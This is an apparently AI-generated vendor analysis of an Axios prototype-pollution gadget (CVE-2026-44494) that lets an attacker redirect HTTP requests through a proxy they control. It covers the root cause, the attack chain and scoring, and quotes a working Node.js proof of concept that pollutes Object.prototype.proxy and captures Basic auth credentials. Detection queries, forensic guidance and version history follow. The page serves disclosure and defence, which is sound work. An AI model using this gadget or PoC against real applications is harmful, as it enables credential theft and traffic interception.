ZeroPath at Black Hat USA 2026

Brief Summary: Axios CVE-2026-44494 Prototype Pollution Gadget Enables Full MITM with PoC and Detection Guidance

A brief summary of CVE-2026-44494, a high severity prototype pollution gadget in Axios that allows escalation to full Man-in-the-Middle attacks. Includes proof of concept details, detection methods, and mitigation guidance.

CVE Analysis

12 min read

ZeroPath CVE Analysis
ZeroPath CVE Analysis

2026-06-11

Brief Summary: Axios CVE-2026-44494 Prototype Pollution Gadget Enables Full MITM with PoC and Detection Guidance
Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

[email protected]

Introduction

A prototype pollution gadget in Axios, the JavaScript ecosystem's most popular HTTP client library, allows any Object.prototype pollution present in an application's dependency tree to be silently escalated into a full Man-in-the-Middle attack, capturing authentication credentials and modifying HTTP responses without any direct user interaction. With over 100 million weekly npm downloads and roughly 174,000 dependent packages, the blast radius of CVE-2026-44494 spans virtually every corner of the Node.js ecosystem, and it arrives in the wake of a confirmed supply chain compromise of the same library just two months earlier.

Technical Information

Root Cause: Unguarded Prototype Chain Traversal on config.proxy

CVE-2026-44494 is classified under two CWEs: CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes) and CWE-441 (Unintended Proxy or Intermediary). This dual classification reflects the two stage nature of the attack: prototype pollution provides the injection vector, and Axios's HTTP adapter provides the gadget that converts that injection into network traffic hijacking.

The vulnerability resides in Axios's Node.js HTTP adapter at lib/adapters/http.js, specifically around line 670. When Axios prepares an outbound HTTP request, it reads config.proxy using standard JavaScript property access. In JavaScript, if an object does not have an "own" property with a given name, the runtime walks up the prototype chain looking for it. This is the fundamental behavior that prototype pollution exploits.

The critical detail is that proxy is not defined in Axios's defaults file (lib/defaults/index.js). When mergeConfig runs to combine user supplied configuration with Axios defaults, it uses Object.keys() to enumerate properties. Since proxy is never present in the defaults object, defaultToConfig2 for proxy is never executed, and the merged configuration object never receives an own proxy property. This means that when config.proxy is later accessed in the HTTP adapter, the lookup traverses the prototype chain. If an attacker has polluted Object.prototype.proxy with a value like {host: "attacker.com", port: 8080, protocol: "http"}, that value is found and treated as a legitimate proxy configuration.

The setProxy() function (lines 191 through 239 of http.js) then rewrites options.hostname and options.port to the attacker controlled values, routing the entire HTTP request through the attacker's proxy server. The attacker can intercept all request data including Authorization headers, cookies, and request bodies, and can return arbitrary forged responses.

The Two Stage Attack Chain

Stage 1: Prototype Pollution Source. The attacker exploits a prototype pollution vulnerability in any dependency within the target application's dependency tree. Common candidates include libraries like qs, lodash, or minimist that parse user controlled input into objects. The attacker pollutes Object.prototype.proxy with a malicious proxy configuration object.

Stage 2: Axios Gadget Activation. When the application makes any HTTP request using Axios, the HTTP adapter reads config.proxy, traverses the prototype chain, finds the attacker injected value, and calls setProxy(). All subsequent HTTP requests are routed through the attacker's proxy. No direct user input to Axios is required; the gadget fires automatically on every request.

Why This Bypasses the Prior Fix (v1.15.0)

An earlier prototype pollution gadget in Axios (GHSA-fvcv-3m26-pcqx) targeted the transformResponse code path and was patched in v1.15.0. That fix did not cover config.proxy because proxy is absent from the defaults file and was therefore never included in the mergeConfig enumeration. CVE-2026-44494 exploits this entirely different, unprotected code path.

CVSS Scoring and Dispute

The official GitHub Advisory rates this vulnerability at CVSS 8.7 (High) with vector CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N. The vulnerability finder rated it at CVSS 9.4 (Critical) with AC:L instead of AC:H, arguing that once any prototype pollution source exists in the dependency tree, exploitation is trivial. Both scores agree on the severe confidentiality and integrity impact: full interception and modification of all HTTP traffic including authentication credentials. Organizations should be aware of this scoring variance and not under prioritize based solely on the 8.7 rating.

ParameterValue
Attack VectorNetwork (AV:N)
Attack ComplexityHigh (AC:H) per official score; Low (AC:L) per finder
Privileges RequiredNone (PR:N)
User InteractionNone (UI:N)
ScopeChanged (S:C)
Confidentiality ImpactHigh (C:H)
Integrity ImpactHigh (I:H)
Availability ImpactNone (A:N)

Proof of Concept

A verified, publicly available proof of concept is published directly within the official GitHub Security Advisory GHSA-35jp-ww65-95wh, authored by the Axios maintainer (jasonsaayman) and credited to reporter August829. The PoC is a self contained Node.js script that sets up an attacker proxy server, a real target server, pollutes the prototype, and demonstrates credential interception:

import http from 'http'; import axios from './index.js'; // Attacker's proxy server const intercepted = []; const proxyServer = http.createServer((req, res) => { intercepted.push({ url: req.url, authorization: req.headers.authorization, headers: req.headers, }); res.writeHead(200, { 'Content-Type': 'application/json' }); res.end('{"hijacked":true}'); }); await new Promise(r => proxyServer.listen(0, r)); const proxyPort = proxyServer.address().port; // Real target server const realServer = http.createServer((req, res) => { res.writeHead(200); res.end('{"data":"real"}'); }); await new Promise(r => realServer.listen(0, r)); const realPort = realServer.address().port; // Prototype pollution Object.prototype.proxy = { host: '127.0.0.1', port: proxyPort, protocol: 'http' }; // "Safe" request — goes through attacker's proxy const resp = await axios.get(`http://127.0.0.1:${realPort}/api/secrets`, { auth: { username: 'admin', password: 'SuperSecret123!' } }); console.log('Response from:', resp.data.hijacked ? 'ATTACKER PROXY' : 'real server'); console.log('Intercepted Authorization:', intercepted[0]?.authorization); // Output: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh (= admin:SuperSecret123!) delete Object.prototype.proxy; realServer.close(); proxyServer.close();

The advisory provides verified output demonstrating the exploit's success:

  • Before pollution, requests reach the real server normally.
  • After Object.prototype.proxy is set to the attacker's address, the same code and URL causes the request to be routed through the attacker's proxy.
  • The attacker's proxy captures the full URL (http://127.0.0.1:<port>/api/secrets), the Authorization header (Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh), and all other headers.
  • The attacker can return arbitrary forged responses (e.g., {"data":"from-attacker-proxy","hijacked":true}).

The gadget requires zero direct user input to Axios. Any separate prototype pollution vulnerability in the application's dependency tree (e.g., in qs, minimist, lodash) is sufficient to trigger the MITM condition across all Axios HTTP requests.

Detection Methods

Detecting CVE-2026-44494 requires a layered approach combining static dependency analysis, runtime behavioral monitoring, and network level anomaly detection.

Software Composition Analysis and Dependency Scanning

The GitHub Advisory Database has published advisory GHSA-35jp-ww65-95wh, which is directly mapped to CVE-2026-44494. Any tool that consumes GitHub's advisory feed, including GitHub Dependabot, will automatically flag vulnerable Axios versions. The affected version range is >= 1.0.0, < 1.16.0, with Snyk additionally tracking < 0.32.0 for the 0.x branch under identifier SNYK-JS-AXIOS-17111079. Tenable's vulnerability database also tracks this CVE for enterprise vulnerability management platforms.

For immediate local detection, run npm audit --json and filter the output for GHSA-35jp-ww65-95wh. Additionally, npm ls axios --all will display every path through which Axios is pulled into your dependency tree, helping identify hidden transitive inclusions.

Runtime Prototype Pollution Detection

Because CVE-2026-44494 is a prototype pollution gadget that weaponizes pollution sourced from elsewhere in the dependency tree, runtime detection requires checking whether Object.prototype has been tampered with. The key runtime indicator of compromise is the presence of a proxy property on Object.prototype containing host, port, and/or protocol sub properties. If Object.prototype.proxy is defined in your Node.js runtime when your application has not explicitly set it, this is a strong signal that prototype pollution has occurred and the Axios gadget may be active.

Node.js heap snapshots (taken via the --inspect flag) can reveal unexpected properties on Object.prototype. This is a powerful forensic technique for post incident analysis or proactive hunting.

Network Level Behavioral Detection

When the gadget fires, the observable network behavior is distinctive: all Axios initiated HTTP/HTTPS requests begin routing through an attacker controlled proxy. This produces several detectable artifacts:

  • HTTP CONNECT method requests appearing in egress logs to destinations not on your approved proxy allowlist.
  • TLS SNI hostname mismatches: the SNI value in the TLS ClientHello will reference the legitimate target hostname, but the TCP connection will resolve to a different IP (the attacker's proxy). NGFW and outbound TLS inspection logs can surface this discrepancy.
  • Axios User Agent strings paired with unexpected proxy hop headers in forward proxy or WAF logs. Look for the axios/<version> User Agent making requests through proxy infrastructure you do not control.

For SIEM environments, filter outbound HTTP requests where proxy_host is non null and not in your approved proxy list AND user_agent contains axios. The TechJack Solutions intelligence report published a validated Microsoft Sentinel KQL query targeting MITRE ATT&CK technique T1071 (Application Layer Protocol):

DeviceNetworkEvents | where Timestamp > ago(7d) | where RemotePort in (80, 443, 8080, 8443) | where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe", "teams.exe", "outlook.exe", "svchost.exe") | summarize Connections = count() by DeviceName, RemoteIP, InitiatingProcessFileName | where Connections > 50 | sort by Connections desc

This query hunts for unusual outbound connection patterns from non browser processes, serving as a behavioral proxy for the kind of anomalous traffic the proxy gadget would produce.

Key Forensic Artifacts

If you suspect exploitation has occurred, preserve and investigate:

  • Node.js application stdout/stderr logs for the exposure window, filtering on strings like proxy, httpsProxy, __proto__, or constructor.prototype.
  • NGFW/WAF outbound connection logs filtered for HTTP CONNECT method requests and TCP sessions where the Host header destination diverges from the TCP destination IP.
  • Node.js process environment dumps (/proc/<pid>/environ) which may reveal injected HTTP_PROXY or HTTPS_PROXY environment variables, and ss -tnp connection state snapshots showing active connections to unexpected IPs.
  • package-lock.json and yarn.lock snapshots establishing which Axios version was deployed, to confirm the exposure window.

MITRE ATT&CK Mapping

This vulnerability maps to three ATT&CK techniques: T1557 (Adversary in the Middle, via the proxy gadget), T1040 (Network Sniffing, for credential capture on redirected sessions), and T1071.001 (Application Layer Protocol: Web Protocols, for the C2 like communication pattern).

As of this writing, no publicly available Sigma rules, YARA rules, Snort signatures, or Suricata rules have been published specifically for CVE-2026-44494. Detection remains primarily version based (via SCA tooling) and behavioral (via network and runtime monitoring).

Affected Systems and Versions

The advisory states the affected range as Axios versions >= 1.0.0 and < 1.16.0. The description text in the advisory broadens this to "All versions (v0.x through v1.x including v1.15.0)." Snyk tracks the 0.x branch as affected for versions < 0.32.0 under identifier SNYK-JS-AXIOS-17111079.

The fixed version is Axios 1.16.0.

The vulnerability specifically affects the Node.js HTTP adapter (lib/adapters/http.js). Browser environments using Axios's XHR adapter are not affected by this particular gadget, as the browser adapter does not use the setProxy() code path.

Vendor Security History

Axios has experienced a concentrated series of security events in 2026, revealing a pattern of systemic weakness in how the library handles configuration objects:

EventDateDescription
GHSA-fvcv-3m26-pcqx (transformResponse gadget)Pre May 2026First prototype pollution gadget in Axios, patched in v1.15.0
Supply chain attackMarch 30, 2026Attacker hijacked lead maintainer's npm account; published malicious versions 1.14.1 and 0.30.4 with a cross platform RAT
CVE-2026-40175April 2026CVSS 10.0 prototype pollution vulnerability, rated critical but deemed not practically exploitable in real Node.js environments by Aikido
CVE-2026-44494 (this advisory)May 29, 2026config.proxy prototype pollution gadget enabling full MITM, patched in v1.16.0
CVE-2026-44495May 29, 2026Separate prototype pollution gadget in HTTP adapter enabling arbitrary HTTP header injection
CVE-2026-42264Published subsequentlyPrototype pollution read side gadgets in HTTP adapter allowing credential injection and request hijacking

The supply chain attack on March 30, 2026 is particularly significant. An attacker hijacked the lead maintainer's npm credentials and published two malicious versions ([email protected] and [email protected]) across both the 1.x and legacy 0.x release branches. These versions contained a cross platform remote access trojan. Trend Micro telemetry indicated the campaign impacted hundreds of devices before the malicious packages were removed from npm. Microsoft, Snyk, Huntress, Orca Security, and JFrog all published independent analyses of the compromise.

The recurring pattern of prototype pollution gadgets suggests that other unprotected code paths may exist in the Axios configuration handling logic. The Singapore Cyber Security Agency (CSA) issued a critical alert specifically for the Axios vulnerability, reflecting the systemic concern around this library's security posture.

References

Detect & fix
what others miss

Works with
  • GitHub
  • GitLab
  • Bitbucket
  • Azure DevOps Services
  • Jira
  • Linear
  • Slack
  • Security Compass
Security magnifying glass visualization